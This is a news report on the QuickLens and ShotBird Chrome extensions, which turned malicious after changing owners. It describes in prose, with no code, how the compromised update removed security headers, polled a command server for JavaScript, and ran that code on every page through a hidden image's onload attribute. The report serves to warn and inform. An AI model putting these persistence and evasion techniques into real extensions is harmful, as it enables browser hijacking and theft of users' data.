A critical cybersecurity threat has emerged from the Chrome Web Store, where two seemingly legitimate browser extensions turned malicious following a transfer of ownership. This incident highlights a dangerous supply chain vulnerability within the browser extension ecosystem, where trusted software can be weaponized after being sold or handed off to a malicious actor. The extensions, QuickLens and ShotBird, were originally developed by an individual associated with the email "akshayanuonline@gmail.com" (BuildMeluon). While QuickLens has been removed from the store, ShotBird remained available at the time of reporting, posing an ongoing risk to users who installed it for its advertised function of creating professional visuals with local processing.
The path to compromise followed a clear pattern. According to research by monxresearch-sec, the ShotBird extension, which received a "Featured" flag from Google in January 2025, was transferred to a new developer ("loraprice198865@gmail.com") last month. Similarly, security researcher John Tuckner of Annex Security detailed that QuickLens was listed for sale on the marketplace ExtensionHub just two days after its initial publication in October 2025 by the original developer. By February 1, 2026, its Chrome Web Store listing showed ownership had changed to "support@doodlebuggle.top." These transfers provided the new, malicious owners with the ability to push updates to the existing user base.
The malicious update deployed to QuickLens on February 17, 2026, was particularly insidious. It maintained the extension's original functionality to avoid user suspicion while embedding powerful attack capabilities. The update introduced code to strip crucial security headers, such as `X-Frame-Options`, from every HTTP response. This action allows malicious scripts injected into a webpage to make arbitrary cross-domain requests, effectively bypassing fundamental web security protections like Content Security Policy (CSP). This creates a wide-open channel for further exploitation on any site the user visits.
Beyond header manipulation, the compromised extension executed a sophisticated data exfiltration and remote code execution routine. It contained code to fingerprint the user's environment, detecting their country, browser, and operating system. Most alarmingly, the extension was configured to poll an external command-and-control server every five minutes. It would fetch JavaScript payloads, store them in the browser's local storage, and ensure their execution on every subsequent page load. This was achieved by dynamically adding a hidden 1x1 pixel GIF image element to the page and setting the malicious JavaScript string as its `onload` attribute, a clever evasion technique. This mechanism grants attackers persistent, remote control over the victim's browser, enabling data theft, further malware deployment, and manipulation of web sessions.
This incident serves as a stark warning to both users and platform operators. It underscores that an extension's safety is not static but can degrade over time through ownership changes. Users must be exceedingly cautious, regularly reviewing their installed extensions and removing those that are non-essential. For Google and other browser vendors, this case emphasizes the urgent need for more rigorous vetting of ownership transfers and post-update behavioral analysis to detect when legitimate extensions are repurposed for malicious ends, protecting millions of users from such supply chain attacks.
